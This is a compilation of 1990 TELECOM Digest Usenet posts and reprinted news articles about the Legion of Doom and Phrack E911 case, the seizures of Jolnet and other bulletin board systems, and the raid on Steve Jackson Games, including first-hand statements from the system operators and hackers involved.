  2961. Subject: CBS News Special Report - "The Busting of The Mentor"
  2962. Message-ID: <4747@accuvax.nwu.edu>
  2963. Date: 5 Mar 90 06:11:49 GMT
  2964. Sender: news@accuvax.nwu.edu
  2965. Organization: Capital Area Central Texas Unix Society, Austin, TX
  2966. Lines: 37
  2967. Approved: Telecom@eecs.nwu.edu
  2968. X-Submissions-To: telecom@eecs.nwu.edu
  2969. X-Administrivia-To: telecom-request@eecs.nwu.edu
  2970. X-Telecom-Digest: Volume 10, Issue 145, Message 6 of 6
  2971. ...I've just gotten a new update on the Mentor's recent apprehension by
  2972. the Feds. Thought you might like to hear something as close to as direct
  2973. from the Mentor as possible under the circumstances.
  2974.    From: Daneel Olivaw #96 @5283
  2975.    Date: Sun Mar 04 19:55:28 1990
  2976. I'll have to play the Mentor for now (with permission granted).
  2977. If you haven't heard the rumors, here is the truth.
  2978. The Mentor was awakened at 6:30am on Thursday (3/1/90) with the gun of
  2979. a Secret Service agent pointed at his head.  The SS proceded to search
  2980. and seize for the next 4 1/2 hours.  Things taken include an AT with
  2981. 80mb HD, HP LaserJet II, various documents, and other thing.  They
  2982. then proceded to raid his office at work, and sieze the computer and
  2983. laser printer there.  Lost in the shuffle was a complete novel (being
  2984. written and due in 2 weeks), and various other things.
  2985. Across town: Those of you who know Erik Bloodaxe, he was also
  2986. awakened, and his house searched.
  2987. Neither have been charged with anything, but they expect to at least
  2988. be called as witnesses at the case of the Phrack Boys (Knight
  2989. Lightning and Tarren King) in Chicago April 15.
  2990. Apparently, they did a shoddy job, as they tagged a book that Mentor
  2991. had borrowed from me (Quarterman's "The Matrix"), and then forgot to
  2992. take it, oh well....
  2993. It ain't lookin so lovely.  Also the UT computer systes are under
  2994. *VERY* close watch, as they were/are being hacked on by hackers around
  2995. the world, including some in Australia, and England.
  2996.                                                         OM
  2997. From: cosell@bbn.com (Bernie Cosell)
  2998. Newsgroups: comp.dcom.telecom
  2999. Subject: Keeping Copies of Illegal Things (was Re: Jolnet, Again)
  3000. Message-ID: <4725@accuvax.nwu.edu>
  3001. Date: 4 Mar 90 04:36:50 GMT
  3002. Sender: news@accuvax.nwu.edu
  3003. Organization: TELECOM Digest
  3004. Lines: 52
  3005. Approved: Telecom@eecs.nwu.edu
  3006. X-Submissions-To: telecom@eecs.nwu.edu
  3007. X-Administrivia-To: telecom-request@eecs.nwu.edu
  3008. X-Telecom-Digest: Volume 10, Issue 143, Message 3 of 8
  3009. }TELECOM Digest     Sat, 3 Mar 90 20:45:00 CST    Special: Jolnet, Again
  3010. This isn't misc.legal, and this isn't the time to be excessively picky
  3011. and critical, but:
  3012. }Here is how he told the tale of the '911 software':
  3013. }The software showed up on his system one day, almost two years ago. It
  3014. }came to him from netsys, where Len Rose was the sysadmin. According to
  3015. }Andrews, when he saw this file, and realized what it was, he knew the
  3016. }thing to do was to 'get it to the proper authorities as soon as
  3017. }possible',...
  3018. }ME> "After you passed it along to Boykin, did you then destroy the
  3019. }file and get it off your site?"
  3020. }RA> "Well, no... I kept a copy also."
  3021. It strikes me that this is a KEY faux pas, regardless of good
  3022. intentions or not.
  3023. }But then, said Andrews, a funny thing happened several months later.
  3024. }The folks at AT&T, instead of being grateful for the return of their
  3025. }software came back to Andrews to (in his words) 'ask for it again.'
  3026. }Somehow, they either never got it the first time; got it but suspected
  3027. }there were still copies of it out; or were just plain confused.
  3028. Just so, and if RA *supplied* another copy, I suspect they'd interpret
  3029. that as pretty convincing evidence that it WAS further distributed,
  3030. and with RA's knowledge.  I know that they didn't actually contact him
  3031. and ask/tell him to expunge all copies of the stuff, but his actions
  3032. clearly demonstrated his knowledge of just what it was he was messing
  3033. with, and I think they could easily show that he incurred an
  3034. obligation to act prudently with it, or else [just guessing now] he
  3035. could be liable to being an accessory after the fact.
  3036. }So he was contacted by the feds about a year ago, and it was at that
  3037. }point he decided it was in his best interest to cooperate with any
  3038. }investigation going on.
  3039. Perhaps his sudden cooperation was less out of pangs of conscience
  3040. that it might have appeared...  [not to besmirch his motives here,
  3041. only to point out that a call from the FBI pointing out that while you
  3042. may not have really DONE anything, your actions _could_ end up landing
  3043. you in court with some serious potential badness going down (and none
  3044. of this untested cheesiness about the the technicalities of bbs's and
  3045. such...  nice mainstream legal liability), could be pretty persuasive
  3046. at converting a concerned, but out-of-the-loop, citizen into an active
  3047. helper].
  3048.   /Bernie\
  3049. From: dattier@chinet.chi.il.us (David Tamkin)
  3050. Newsgroups: comp.dcom.telecom
  3051. Subject: Seizures Spreading
  3052. Message-ID: <4724@accuvax.nwu.edu>
  3053. Date: 4 Mar 90 05:55:20 GMT
  3054. Sender: news@accuvax.nwu.edu
  3055. Organization: TELECOM Digest
  3056. Lines: 15
  3057. Approved: Telecom@eecs.nwu.edu
  3058. X-Submissions-To: telecom@eecs.nwu.edu
  3059. X-Administrivia-To: telecom-request@eecs.nwu.edu
  3060. X-Telecom-Digest: Volume 10, Issue 143, Message 2 of 8
  3061. News is that Illuminati BBS, a system run by a company named Steve
  3062. Jackson Games somewhere in Texas, was also shut down and its equipment
  3063. seized by the federal government because two suspected Legion of Doom
  3064. members were among its users.
  3065. [Moderator's Note: And I suspect the raids will continue during the
  3066. next week or two. I wonder which sites will be next?  Each place they
  3067. raid, the local crackers point their fingers at each other like
  3068. naughty children, and to make themselves seem like the good guys they
  3069. say, "Have you talked to so-and-so yet?". Let's see now: netsys,
  3070. jolnet, attctc, illuminati, (your name here?)... Apparently even
  3071. getting rid of incriminating evidence won't work any longer, if
  3072. someone upstream of you tattled.  PT]
  3073. From: mosley@peyote.cactus.org (Bob Mosley III)
  3074. Newsgroups: comp.dcom.telecom
  3075. Subject: Austin, TX BBS Shut Down From Joinet Bust Fallout
  3076. Message-ID: <4723@accuvax.nwu.edu>
  3077. Date: 4 Mar 90 17:22:26 GMT
  3078. Sender: news@accuvax.nwu.edu
  3079. Organization: Capital Area Central Texas Unix Society, Austin, TX
  3080. Lines: 28
  3081. Approved: Telecom@eecs.nwu.edu
  3082. X-Submissions-To: telecom@eecs.nwu.edu
  3083. X-Administrivia-To: telecom-request@eecs.nwu.edu
  3084. X-Telecom-Digest: Volume 10, Issue 143, Message 1 of 8
  3085. This hit most BBS's in the Austin area on Thursday. It's believed
  3086. the bust came down Wednesday morning. In a nutshell, here's what
  3087. happened:
  3088. Wednesday morning, Feb. 28, the offices of Steve Jackson Games, inc.,
  3089. were raided by FBI and Secret Service officials. The establishment was
  3090. shit down, and all computer systems, including the Illuminati BBS,
  3091. were confiscated.
  3092. At that time, a 'retired' member of the LoD, who was identified as
  3093. 'The Mentor' was arrested. The charges reportedly are related to the
  3094. recent 911 bust that has shut down joinet and attatc (or whatever
  3095. Killerused to be called). His home system was confiscated, complete
  3096. with an entire collection of "Phrack" issues and related paraphanalia.
  3097. As of this writing, the Mentor is reportedly out on bail, sans system
  3098. and network connection. The Illuminati BBS is still down, although SJ
  3099. Games is back in operation, and no charges have been filed against any
  3100. of the employees other than The Mentor. The systems owned by SJ Games
  3101. have not been returned as of this writing.
  3102. Finally, rumors were trickling in early this morning (Saturday, 3/4)
  3103. that two BBS's in Dallas, three in Houston, and one in San Antonio
  3104. were busted by the same authorites in relation to the same case.
  3105. [in light of the Mentor's posted defense of the LoD, I kinda thought
  3106. you'd like to see this one! - OM]
  3107. From: telecom@eecs.nwu.edu (TELECOM Moderator)
  3108. Newsgroups: comp.dcom.telecom
  3109. Subject: Jolnet, Again
  3110. Message-ID: <4701@accuvax.nwu.edu>
  3111. Date: 4 Mar 90 02:45:00 GMT
  3112. Sender: news@accuvax.nwu.edu
  3113. Organization: TELECOM Digest
  3114. Lines: 350
  3115. Approved: Telecom@eecs.nwu.edu
  3116. X-Submissions-To: telecom@eecs.nwu.edu
  3117. X-Administrivia-To: telecom-request@eecs.nwu.edu
  3118. X-Telecom-Digest: Special: Jolnet, Again
  3119. TELECOM Digest     Sat, 3 Mar 90 20:45:00 CST    Special: Jolnet, Again
  3120. Today's Topics:                             Moderator: Patrick Townson
  3121.     Re: AT&T Sourcecode: Poison! (Chip Rosenthal)
  3122.     Jolnet Seizure (Mike Riddle)
  3123.     Article Regarding JOLNET/e911/LoD/Phrack (Ben Rooney)
  3124.     A Conversation With Rich Andrews (TELECOM Moderator)
  3125.     Killer/attctc Permanently Down (Charlie Boykin)
  3126. ----------------------------------------------------------------------
  3127. From: Chip Rosenthal <chip@chinacat.lonestar.org>
  3128. Subject: Re: AT&T Sourcecode: Poison!
  3129. Date: 3 Mar 90 00:00:00 GMT
  3130. Organization: Unicom Systems Development, Austin (yay!)
  3131. [Moderator's Note: Original date of 2/25 changed to prevent premature
  3132. expiration.  PT]
  3133. You've got a lot of nerve, Patrick.
  3134. telecom@eecs.nwu.edu (TELECOM Moderator) writes:
  3135. >We're told by a deep-throat type that AT&T is on the war path about
  3136. >their software [...] Like jolnet, netsys went down abruptly, with
  3137. >*everything* confiscated [...] Now comes news that attcdc [sic], formerly
  3138. >known as killer went off line in a hurry.....
  3139. Yessir, after all your complaints about that about anonymous Legion of
  3140. Doom message, this is a really crummy thing to post.  Based upon
  3141. unattributed conversations, you imply that Len Rose and Charlie Boykin
  3142. were involved in wrongdoing which lead to the shutdown of their
  3143. systems.
  3144. I don't know Len personally, but have had uucp connections with him in
  3145. the past.  Charlie, on the other hand, I do know personally.  He is
  3146. very well regarded in the Dallas/Fort Worth area, and was voted "1989
  3147. DFW Administrator of the Year" by the DFW lunch-bunch...errr....DFW
  3148. Association of Unix System Administrators.
  3149. You have cast some crummy aspersions towards these guys.  Since I know
  3150. them, I will wait for the facts to come in.  Others who don't know
  3151. them could very well jump to conclusions on the basis of this posting.
  3152. Was this message really called for?
  3153. Chip Rosenthal                            |  Yes, you're a happy man and you're
  3154. chip@chinacat.Lonestar.ORG                |  a lucky man, but are you a smart
  3155. Unicom Systems Development, 512-482-8260  |  man?  -David Bromberg
  3156. ------------------------------
  3157. Date: Wed, 28 Feb 90 21:38:39 EST
  3158. From: Mike Riddle <Mike.Riddle@p6.f666.n5010.z1.fidonet.org>
  3159. Subject: Jolnet Seizure
  3160. Reply-to: Mike.Riddle@p6.f666.n285.z1.fidonet.org
  3161. Organization: DRBBS Technical BBS, Omaha, Ne. 402-896-3537
  3162. Has anyone tried a novel legal approach to the case of equipment
  3163. seizure as "evidence"?  As I remember the Electronic Communications
  3164. Privacy Act, it contains specific procedures for authorities to obtain
  3165. copies/listings of data on a system (which system may have been used
  3166. for illegal purposes, but whose operator is not at the moment
  3167. charged).  From this I think a creative attorney could construct an
  3168. argument that the national policy was not to seize equipment, merely
  3169. to obtain all the information contained therein.  After all, it's the
  3170. data that caused any harm.
  3171. Also, the Federal Rules of Evidence, and most state rules, provide
  3172. that computer generated copies are "originals" for evidentiary
  3173. purposes.
  3174. I hope that someone close enough to the scene can keep us informed
  3175. about what is happening on this one.
  3176. {standard disclaimer goes here--don't pay any attention to me!}
  3177.    --- Ybbat (DRBBS) 8.9 v. 3.07 r.1
  3178.   * Origin: [1:285/666.6@fidonet] The Inns of Court, Papillion, NE  (285/666.6)
  3179.    --- Through FidoNet gateway node 1:16/390
  3180.    Mike.Riddle@p6.f666.n5010.z1.fidonet.org
  3181. ------------------------------
  3182. From: brooney@sirius.uvic.ca
  3183. Date:  3 Mar 90  2:36 -0800
  3184. Subject: Article Regarding JOLNET/e911/LoD/Phrack
  3185. The following is an article I received five days ago which contains, to my
  3186. knowledge, information as yet unpublished in comp.dcom.telecom regarding the
  3187. ongoing JOLNET/e911/LoD discussion.  It was printed in a weekly magazine
  3188. with a publishing date of Feb. 27 but other than that I have no exact idea
  3189. of when the events mentioned herein took place.
  3190.  - Ben Rooney
  3191. MISSOURI STUDENT PLEADS INNOCENT TO 911 CHARGES
  3192.  [Knight Lightning], a 19-year-old University of Missouri student, has
  3193. pleaded not guilty to federal allegations that he invaded the 911
  3194. emergency phone network for 9 states.
  3195.  As reported earlier, he was indicted this month along with [The Prophet],
  3196. 20, of Decatur, Ga.  Both are charged with interstate
  3197. transportation of stolen property, wire fraud, and violations of the
  3198. federal Computer Fraud and Abuse Act of 1986.
  3199.  Prosecutors contend the two used computers to enter the 911 system of
  3200. Atlanta's Bell South, then copied the program that controls and
  3201. maintains the system.  The stolen material later allegedly was
  3202. published on a computer bulletin board system operating in the Chicago
  3203. suburb of Lockport.  Authorities contend Neidorf edited the data for
  3204. an electronic publication known as "Phrack."
  3205.  According to Associated Press writer Sarah Nordgren, in a recent
  3206. hearing on the case Assistant U.S. Attorney William Cook was granted a
  3207. motion to prevent the 911 program from becoming part of the public
  3208. record during the trial.  U.S. District Judge Nicholas Bua set April
  3209. 16 for a trial.
  3210.  The 911 system in question controls emergency calls to police, fire,
  3211. ambulance and emergency services in cities in Alabama, Mississippi,
  3212. Georgia, Tennessee, Kentucky, Louisiana, North Carolina, South
  3213. Carolina and Florida.
  3214.                 ---------------------------------------
  3215.           Article from "A Networker's Journal" by Charles Bowen.
  3216.                     Info-Mat Magazine (Vol. 6, No. 2)
  3217. [Moderator's Note: {Info-Mat Magazine}, by the way, is the excellent
  3218. electronic journal distributed on many BBS machines throughout the
  3219. United States who are fortunate enough to be accepted as part of the
  3220. magazine's distribution network.  I personally wish it was distributed
  3221. on Usenet as well: it is well written and very informative.   PT]
  3222. ------------------------------
  3223. Date: Sat, 3 Mar 90 19:34:54 CST
  3224. From: TELECOM Moderator <telecom@eecs.nwu.edu>
  3225. Subject: A Conversation With Rich Andrews
  3226. After the first articles appeared here relating to the seizure of
  3227. Jolnet, and the indictment of some people for their part in the theft
  3228. of '911 software', I got various messages from other folks in
  3229. response. Some were published, while others were just personal
  3230. correspondence to me. One from Chip Rosenthal was held over, and is
  3231. included in this special issue today.
  3232. One writer, whose comments were attributed to 'Deep Throat' spent some
  3233. time on two occassions on the phone, in a conference call between
  3234. himself, David Tamkin and myself.
  3235. What was lacking in the several messages which appeared over the past
  3236. week were comments from Rich Andrews, system administrator of Jolnet.
  3237. I got one note from someone in Canada who said Andrews wanted to speak
  3238. with me, and giving a phone number where I could call Andrews at his
  3239. place of employment.
  3240. I put in a call there, with David Tamkin on the other line and had a
  3241. long discussion with Andrews, who was aware of David being on the line
  3242. with me.  I asked Andrews if he had any sort of net access available
  3243. to him at all -- even a terminal and modem, plus an account on some
  3244. site which could forward his mail to telecom. You see, I thought, and
  3245. still think it is extremely important to include Rich Andrews in any
  3246. discussion here.
  3247. He assured me he did have an account on a Chicago area machine, and
  3248. that a reply would be forthcoming within hours. I had a second
  3249. conversation with him the next morning, but without David on the line.
  3250. He again told me he would have a response to the several articles
  3251. written in the Digest ready and in the email 'very soon'.  This was on
  3252. Wednesday morning, and we estimated his message would be here sometime
  3253. later in the day -- certainly by midnight or so, when I am typically
  3254. working up an issue of the Digest.
  3255. Midnight came and went with no message. None showed up Thursday or
  3256. Friday.  I deliberatly withheld saying anything further in the hopes
  3257. his reply would be here to include at the same time. I guess at this
  3258. point we have to go on without him.
  3259. When David Tamkin and I talked to him the first time, on Tuesday
  3260. evening this past week, the first thing Andrews said to us, after the
  3261. usual opening greetings and chitchat was,
  3262.  "I've been cooperating with them for over a year now. I assume you
  3263. know that."
  3264. We asked him to define 'them'.  His response was that 'them' was the
  3265. United States Secret Service, and the Federal Bureau of Investigation.
  3266. He said this without us even asking him if he was doing so.
  3267. We asked him to tell us about the raid on his home early in February.
  3268. He said the agents showed up that Saturday afternoon with a warrant,
  3269. and took everything away as 'evidence' to be used in a criminal
  3270. prosecution.
  3271. ME> "If you have been working and cooperating with them for this long,
  3272. why did they take your stuff?"
  3273. RA> "They wanted to be sure it would be safe, and that nothing would be
  3274. destroyed."
  3275. ME> "But if you wanted to simply keep files safe, you could have taken
  3276. Jolnet off line for a few weeks/months by unplugging the modems from
  3277. the phone jacks, no? Then, plugged in a line when you wanted to call
  3278. or have a trusted person call you."
  3279. RA> "They thought it was better to take it all with them. It was mostly
  3280. for appearance sake. They are not charging me with anything."
  3281. ME> "Seems like a funny way to treat a cooperative citizen, at least
  3282. one who is not in some deep mess himself."
  3283. He admitted to us that several crackers had accounts on Jolnet, with
  3284. his knowledge and consent, and that it was all part of the investigation
  3285. going on ... the investigation he was cooperating in.
  3286. Here is how he told the tale of the '911 software':
  3287. The software showed up on his system one day, almost two years ago. It
  3288. came to him from netsys, where Len Rose was the sysadmin. According to
  3289. Andrews, when he saw this file, and realized what it was, he knew the
  3290. thing to do was to 'get it to the proper authorities as soon as
  3291. possible', so he chose to do that by transferring it to the machine
  3292. then known as killer, a/k/a attctc, where Charlie Boykin was the
  3293. sysadmin.
  3294. Andrews said he sent it to Boykin with a request that Boykin pass it
  3295. along to the proper people at AT&T.
  3296. ME> "After you passed it along to Boykin, did you then destroy the
  3297. file and get it off your site?"
  3298. RA> "Well, no... I kept a copy also."
  3299. ME> "Did Charlie Boykin pass it along to AT&T as you had requested?"
  3300. RA> "I assume he did."
  3301. But then, said Andrews, a funny thing happened several months later.
  3302. The folks at AT&T, instead of being grateful for the return of their
  3303. software came back to Andrews to (in his words) 'ask for it again.'
  3304. Somehow, they either never got it the first time; got it but suspected
  3305. there were still copies of it out; or were just plain confused.
  3306. So he was contacted by the feds about a year ago, and it was at that
  3307. point he decided it was in his best interest to cooperate with any
  3308. investigation going on.
  3309. Andrews pointed out that the '911 software' was really just ".... a
  3310. small part of what this is all about..."  He said there was other
  3311. proprietary information going around that should not be circulating.
  3312. He said also the feds were particularly concerned by the large number
  3313. of break-ins on computers which had occurred in the past year or so.
  3314. He said there have been literally "....thousands of attempts to break
  3315. into sites in the past year....", and part of his cooperation with the
  3316. authorities at this time dealt with information on that part of it.
  3317. We asked him about killer/attctc:
  3318. ME> "You knew of course that killer went off line very abruptly about
  3319. a week ago. What caused that? It happened a week or so after the feds
  3320. raided you that Saturday."
  3321. RA> "Well the official reason given by AT&T was lack of funds, but you
  3322. know how that goes...."
  3323. Now you'd think, wouldn't you, that if it was a funding problem -- if
  3324. you can imagine AT&T not having the loose change in its corporate
  3325. pocket it took to provide electrical power and phone lines to attctc
  3326. (Charlie got no salary for running it) -- that at least an orderly
  3327. transition would have taken place; i.e. an announcement to the net; an
  3328. opportunity to distribute new maps for mail and news distribution,
  3329. etc; and some forthcoming shut down date -- let's say March 1, or
  3330. April 1, or the end of the fiscal year, or something....
  3331. But oh, no...  crash boom, one day it is up, the next day it is gone.
  3332. ME> "What do you know about the temporary suspension of killer some
  3333. time ago? What was that all about?"
  3334. RA> "It was a security thing. AT&T Security was investigating Charlie
  3335. and some of the users then."
  3336. Andrews referred to the previous shutdown of killer as 'a real blunder
  3337. by AT&T', but it is unclear to me why he feels that way.
  3338. We concluded our conversation by Andrews noting that "there is a lot
  3339. happening out there right now."
  3340. He said the [Phrack] magazine distribution, via netsys, attctc and
  3341. jolnet was under close review. "One way to get them (crackers) is by
  3342. shutting down the sites they use to distribute stuff..."
  3343. And now, dear reader, you know everything I know on the subject. Well,
  3344. almost everything, anyway....
  3345.  From other sources we know that Len Rose of netsys was in deep
  3346. trouble with the law *before* this latest scandal.  How deep? Like he
  3347. was ready to leave the country and go to the other side of the world
  3348. maybe?  Like he was in his car driving on the expressway when they
  3349. pulled him over, stopped the car and placed him under arrest?  Deep
  3350. enough? This latest thing simply compounded his legal problems.
  3351. Patrick Townson
  3352. ------------------------------
  3353. Date: Fri Mar  2 06:59:23 1990
  3354. From: Charlie Boykin <cfb@sulaco.sigma.com>
  3355. Subject: Killer/attctc Is Permanently Down
  3356. Hello,
  3357.     Regarding a couple of things as well as a message from Bill Huttig.
  3358.     The system WAS shut down a couple of years ago - for three weeks -
  3359. as part of a security inquiry. It has been in continous operation
  3360. since. On July 4, 1989, it was moved to a Customer Demonstration
  3361. location at the Dallas Infomart and the node name changed to attctc
  3362. (for AT&T Customer Technology Center). The system was closed down on
  3363. February 20, 1990 after 5 years of operation. There are no charges
  3364. pending and the "management" of the system have been ostensibly
  3365. cleared of any illegal activities.
  3366.    As of now, there are no intentions of returning the system to
  3367. service.  There are hopeful plans and proposals that could conceivably
  3368. result in the system being placed back in service in a different
  3369. environment and under different management.
  3370.                                         Respectfully,
  3371.                                         Charles F. Boykin
  3372.                                         Formerly sysop\@attctc (killer)
  3373. ------------------------------
  3374. End of TELECOM Digest Special: Jolnet, Again
  3375. ******************************
  3376. ---------------
  3377. [reprinted without permission from the Feb. 12th, 1990 issue of Telephony]
  3378. ALLEGED HACKERS CHARGED WITH THEFT OF 911 DATA
  3379. Dawn Bushaus, Assistant Editor
  3380.      Four alleged computer hackers were indicted last week on charges that they
  3381. schemed to steal and publish proprietary BellSouth Corp. emergency data.  The
  3382. alleged activity could have produced disruptions in 911 networks nationwide,
  3383. according to federal officials.
  3384.      The case could raise new concerns about the security of local exchange
  3385. carriers' internal computer networks, which house data records on customers,
  3386. equipment and operations.
  3387.      "Security has always been a concern for the telephone companies," said
  3388. Peter Bernstein, an analyst with Probe Research.  "If you can crack the 911
  3389. system, what does that say about the operational support system or the billing
  3390. system?"
  3391.      A federal grand jury in Chicago handed down two indictments charging
  3392. [The Prophet], 20, of Decatur, Ga., and [Knight Lightning], 19, of
  3393. Chesterfield, Mo., with wire fraud, violations of the 1986 Computer Fraud Act
  3394. and interstate transportation of stolen property.
  3395.      Facing similar criminal charges in Atlanta are [The Urvile], 22, and
  3396. [The Leftist], 23.
  3397.      The four, alleged to be part of a closely knit group of hackers calling
  3398. themselves the Legion of Doom, reportedly participated in a scheme to steal the
  3399. BellSouth 911 data, valued at $80,000, and publish it in a hacker magazine
  3400. known as "Phrack."
  3401.      The Legion of Doom reportedly is known for entering telephone companies'
  3402. central office switches to reroute calls, stealing computer data and giving
  3403. information about accessing computers to fellow hackers.
  3404.      According to the Chicago indictment, XXXXX, also known as "The Prophet,"
  3405. stole a copy of the BellSouth 911 program by using a computer outside the
  3406. company to tap into the BellSouth computer.  Riggs then allegedly transferred
  3407. the data to a computer bulletin board in Lockport, Ill.
  3408.      XXXXXXX, also known as "Knight Lightning," reportedly downloaded the
  3409. information into his computer at the University of Missouri, Columbia, where he
  3410. edited it for publication in the hacker magazine, the indictment said.
  3411.      The indictment also charges that the hackers disclosed the stolen
  3412. information about the operation of the enhanced 911 system to other hackers so
  3413. that they could illegally access the system and potentially disrupt or halt
  3414. other systems across the country.
  3415.      The indictments followed a year-long investigation, according to U.S.
  3416. Attorney Ira Raphaelson.  If convicted, the alleged hackers face 31 to 32 years
  3417. in prison and $122,000 in fines.
  3418.      A BellSouth spokesman said the company's security system discovered the
  3419. intrusion, which occurred about a year ago, and the company then notified
  3420. federal authorities.
  3421.      Hacker invasion in the BellSouth network is very rare, the spokesman said,
  3422. adding that the company favors "stringent laws on the matter."
  3423.      The indictment solicited concern about the vulnerability of the public
  3424. network to computer hacking.
  3425. ----------------
  3426. From: MM02885@swtexas.bitnet
  3427. Newsgroups: comp.dcom.telecom
  3428. Subject: Re: Hacker Group Accused of Scheme Against BellSouth
  3429. Message-ID: <4153@accuvax.nwu.edu>
  3430. Date: 20 Feb 90 11:16:00 GMT
  3431. Sender: news@accuvax.nwu.edu
  3432. Organization: TELECOM Digest
  3433. Lines: 95
  3434. Approved: Telecom@eecs.nwu.edu
  3435. X-Submissions-To: telecom@eecs.nwu.edu
  3436. X-Administrivia-To: telecom-request@eecs.nwu.edu
  3437. X-Telecom-Digest: Volume 10, Issue 118, message 3 of 6
  3438.                <<< SYS$ANCILLARY:[NOTES$LIBRARY]GENERAL.NOTE;1 >>>
  3439.                             -< General Discussion >-
  3440. ==============================================================================
  3441. Note 155.6                 the MENTOR of the tree tops                  6 of 6
  3442. SWT::RR02026 "Ray Renteria [ F L A T L I N E ] "   89 lines  20-FEB-1990 00:18
  3443.                          -< Life, The Universe, & LOD >-
  3444. To set the record straight, a member of LOD who is a student in Austin
  3445. and who has had his computer account at UT subpoenaed by the DA out of
  3446. Chicago because of dealings with the above happenings:
  3447. My name is Chris, but to the computer world, I am Erik Bloodaxe.  I
  3448. have been a member of the group known as Legion of Doom since its
  3449. creation, and admittedly I have not been the most legitimate computer
  3450. user around, but when people start hinting at my supposed
  3451. Communist-backed actions, and say that I am involved in a world-wide
  3452. consipracy to destroy the nations computer and/or 911 network, I have
  3453. to speak up and hope that people will take what I have to say
  3454. seriously.
  3455. Frank, Rob and Adam were all definately into really hairy systems.
  3456. They had basically total control of a packet-switched network owned by
  3457. Southern Bell (SBDN)...through this network they had access to every
  3458. computer Southern Bell owned...this ranging from COSMOS terminals up
  3459. to LMOS front ends.  Southern Bell had not been smart enough to
  3460. disallow connections from one public pad to another, thus allowing
  3461. anyone who desired to do so, the ability to connect to, and seize
  3462. information from anyone else who was using the network...thus they
  3463. ended up with accounts and passwords to a great deal of systems.
  3464. This was where the 911 system came into play.  I don't know if this
  3465. system actually controlled the whole Southern Bell 911 network, or if
  3466. it was just a site where the software was being developed, as I was
  3467. never on it.  In any case, one of the trio ended up pulling files off
  3468. of it for them to look at.  This is usually standard proceedure: you
  3469. get on a system, look around for interesting text, buffer it, and
  3470. maybe print it out for posterity.  No member of LOD has ever (to my
  3471. knowledge) broken into another system and used any information gained
  3472. from it for personal gain of any kind...with the exception of maybe a
  3473. big boost in his reputation around the underground.  Rob took the
  3474. documentation to the system and wrote a file about it.  There are
  3475. actually two files, one is an overview, the other is a glossary.  (Ray
  3476. has the issue of PHRACK that has the files) The information is hardly
  3477. something anyone could possibly gain anything from except knowledge
  3478. about how a certain aspect of the telephone company works.
  3479. The Legion of Doom used to publish an electronic magazine called the
  3480. LOD Technical Journal.  This publication was kind of abandoned due to
  3481. laziness on our part.  PHRACK was another publication of this sort,
  3482. sent to several hundred people over the Internet, and distributed
  3483. widely on bulletin boards around the US.  Rob sent the files to PHRACK
  3484. for the information to be read.  One of PHRACK's editors, Craig,
  3485. happened to be the one who received the files.  If Rob had sent the
  3486. files to one address higher, Randy would have been the one who would
  3487. probably be in trouble.  In anycase, Craig, although he may have
  3488. suspected, really had no way to know that the files were propriatary
  3489. information and were stolen from a Southern Bell computer.
  3490. The three Atlanta people were busted after having voice and data taps
  3491. on their lines for 6 months.  The Phrack people were not busted, only
  3492. questioned, and Craig was indicted later.
  3493. What I don't understand is why Rob and Craig are singled out more
  3494. often than any other people.  Both of them were on probation for other
  3495. incidents and will probably end up in jail due to probation violations
  3496. now.  Frank and Adam still don't know what is going on with their
  3497. cases, as of the last time I spoke with them.
  3498. The whole bust stemmed from another person being raided and rolling
  3499. over on the biggest names he could think of to lighten his burden.
  3500. Since that time, Mr. William Cook, the DA in Chicago, has made it his
  3501. life's goal to rid the world of the scourge of LOD.  The three Atlanta
  3502. busts, two more LOD busts in New York, and now, my Subpoena.
  3503. People just can't seem to grasp the fact that a group of 20 year old
  3504. kids just might know a little more than they do, and rather than make
  3505. good use of us, they would rather just lock us away and keep on
  3506. letting things pass by them.  I've said this before, you cant stop
  3507. burglars from robbing you when you leave the doors unlocked and merely
  3508. bash them in the head with baseball bats when they walk in.  You need
  3509. to lock the door.  But when you leave the doors open, but lock up the
  3510. people who can close them for you another burglar will just walk right
  3511. in.
  3512. If anyone really wants to know anything about what is going on or just
  3513. wants to offer any opinions about all this directly to me, I'm
  3514. erikb@walt.cc.utexas.edu
  3515. but my account is being monitored so don't ask anything too explicit.
  3516. ->ME
  3517. -----------
  3518. Well, as some of you may already know, the people that put out Phrack were
  3519. busted recently.  Up until now, details were scarce, but things are starting to
  3520. appear in the news.
  3521. [reprinted without permission from the Milwaukee Journal Wed. Feb. 7th]
  3522.         Chicago, Ill. - AP - A computer hacker broke into the 911 emergency
  3523. telephone network covering nine states in the South and another intruder passed
  3524. on the access data to other hackers, authorities said.
  3525.         [The Prophet], 20, of Decatur, GA., and [Knight Lightning],
  3526. 19, of Chesterfield, MO., were indicted Tuesday by
  3527. a federal grand jury and accused of computer crimes, said acting US Atty. Ira
  3528. H. Raphaelson.
  3529.         He said Riggs was a member of the so-called Legion of Doom hackers
  3530. group, whose members are involved in numerous illegal activities.
  3531.         Riggs and two other alleged members also were indicted in Atlanta and
  3532. charged in other computer break-ins.
  3533.         The government would not say if any emergency calls were disrupted or
  3534. whether other damage was done during the tampering.
  3535. ------------
  3536. Name: The Prophet #104
  3537. Date: Tue Feb 06 23:55:15 1990
  3538. Imagine that you're deaf, dumb, blind, and paralyzed from the neck down and
  3539. totally unable to experience or communicate with the outside world.  How long
  3540. could you retain your sanity?  How many of you would choose to die instead?
  3541. How many of you think you could muster the willpower to create your own little
  3542. mental world to live in for the rest of your life, and how long do you think
  3543. the hospital would wait before putting you out of your misery?
  3544.   -The Prophet
  3545. ------------
  3546. Name: The Mentor #1
  3547. Date: Sat Jan 20 02:58:54 1990
  3548. Welp, Phrack magazine is dead. Those of you who pay attention to BITNET know
  3549. that the phrack accounts at U of M have been shut down. The story is as
  3550. follows...
  3551. Government agents (not sure of the dept., probably SS) have apparently been
  3552. monitoring the e-mail of the Phrack kids (Knight Lightning & Taran King) for
  3553. some time now. Apparently, a portion of a file sent to them (and subsequently
  3554. published) contained copyrighted information. This is all they needed. They
  3555. have now seized the entire Phrack net mailing list (over 500 accounts), plust
  3556. every piece of information that Randy & Craig have (and they have a *LOT*) on
  3557. real names, addresses and phone numbers.
  3558. This is evolving directly out of the busts of three LOD members (Urvile,
  3559. Leftist & Prophet). The Prophet (who is on probation) is apparently being
  3560. threatened with a prison term if he doesn't cooperate. We don't know for sure
  3561. if he cooperated or not, but what would you do in the same position?
  3562. The same officials are apparently *VERY* interested in our co-sys, Mr.
  3563. Bloodaxe. His net account is being watched, etc. I'll let him tell the story.
  3564. board only. I will be adding a secure (and I mean fucking secure) encryption
  3565. routine into the e-mail in the next 2 weeks - I haven't decided exactly how to
  3566. implement it, but it'll let two people exchange mail encrypted by a password
